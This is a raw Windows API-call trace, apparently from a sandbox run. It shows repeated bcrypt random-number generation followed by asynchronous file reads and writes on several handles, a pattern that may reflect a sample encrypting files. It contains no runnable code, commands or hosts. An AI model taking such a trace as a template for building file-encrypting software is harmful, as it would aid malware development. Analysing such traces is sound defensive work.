(_Block=0x3e305b8) [0157.304] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0157.304] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0157.305] free (_Block=0x1fa91d0) [0157.305] free (_Block=0x1fa2ed8) [0157.305] free (_Block=0x1fa90b8) [0157.305] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0157.305] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.307] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2af0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0157.307] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.308] CloseHandle (hObject=0x308) returned 1 [0157.308] free (_Block=0x3df0008) [0157.308] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.319] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.319] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.319] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0157.319] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.320] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.320] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0157.320] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0157.320] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0157.320] free (_Block=0x3e305b8) [0157.320] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0157.320] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0157.321] free (_Block=0x1fa91d0) [0157.321] free (_Block=0x1fa2ed8) [0157.321] free (_Block=0x1fa90b8) [0157.321] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0157.321] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.323] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4a60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0157.323] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.336] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4dfa, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0157.337] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.338] CloseHandle (hObject=0x308) returned 1 [0157.338] free (_Block=0x3df0008) [0157.338] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.571] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.777] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0157.778] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.778] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0157.778] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0157.778] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0157.778] free (_Block=0x3e305b8) [0157.778] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0157.779] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0157.779] free (_Block=0x1fa91d0) [0157.779] free (_Block=0x1fa2ed8) [0157.779] free (_Block=0x1fa90b8) [0157.780] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0157.780] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.780] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0157.780] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.833] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x103e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0157.834] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.834] CloseHandle (hObject=0x308) returned 1 [0157.834] free (_Block=0x3df0008) [0157.834] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.850] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.850] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0157.851] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.851] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.851] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0157.851] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0157.851] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0157.851] free (_Block=0x3e305b8) [0157.851] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0157.851] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0157.852] free (_Block=0x1fa91d0) [0157.852] free (_Block=0x1fa2ed8) [0157.852] free (_Block=0x1fa90b8) [0157.852] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0157.852] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.865] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x4a10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0157.865] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.873] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2cf8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0157.874] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.885] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.886] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0157.886] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.886] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0157.887] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0157.887] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0157.887] free (_Block=0x3e305b8) [0157.887] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0157.887] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0157.887] free (_Block=0x1fa91d0) [0157.887] free (_Block=0x1fa2ed8) [0157.887] free (_Block=0x1fa90b8) [0157.887] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0157.888] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.897] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.897] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0157.897] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.898] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0157.898] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0157.898] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0157.898] free (_Block=0x3e305b8) [0157.898] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0157.898] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0157.899] free (_Block=0x1fa91d0) [0157.899] free (_Block=0x1fa2ed8) [0157.899] free (_Block=0x1fa90b8) [0157.899] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0157.899] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.916] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x4f90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0157.916] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.931] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x544c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0157.935] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.944] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.945] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0157.945] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.945] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0157.946] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0157.946] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0157.946] free (_Block=0x3e305b8) [0157.946] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0157.946] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0157.946] free (_Block=0x1fa91d0) [0157.946] free (_Block=0x1fa2ed8) [0157.946] free (_Block=0x1fa90b8) [0157.946] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0157.947] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.967] CloseHandle (hObject=0x2a8) returned 1 [0157.967] free (_Block=0x3f70048) [0157.967] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.968] CloseHandle (hObject=0x308) returned 1 [0157.968] free (_Block=0x3df0008) [0157.968] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.971] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.971] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0157.971] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.972] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0157.973] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0157.973] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0157.973] free (_Block=0x3e305b8) [0157.973] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0157.973] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0157.973] free (_Block=0x1fa91d0) [0157.973] free (_Block=0x1fa2ed8) [0157.973] free (_Block=0x1fa90b8) [0157.973] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0157.974] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0158.271] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xaac0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0158.271] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0158.877] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x28be, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0158.889] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0158.903] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x24d7, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0158.917] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0158.927] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2e7e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0158.936] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0158.940] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.940] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.940] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0158.940] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.941] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0158.941] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0158.941] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0158.941] free (_Block=0x3e305b8) [0158.941] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0158.941] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0158.941] free (_Block=0x1fa91d0) [0158.941] free (_Block=0x1fa2ed8) [0158.941] free (_Block=0x1fa90b8) [0158.941] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0158.941] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0158.943] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3260, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0158.943] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0158.952] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x27e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0158.952] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0158.975] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2cdd, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0158.976] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0158.980] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x4c6d, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0158.981] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0158.981] CloseHandle (hObject=0x308) returned 1 [0158.981] free (_Block=0x1ff1e60) [0158.981] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0158.987] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x4ad8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0158.990] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0158.990] CloseHandle (hObject=0x3cc) returned 1 [0158.990] free (_Block=0x3d70450) [0158.990] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0159.006] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.007] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e 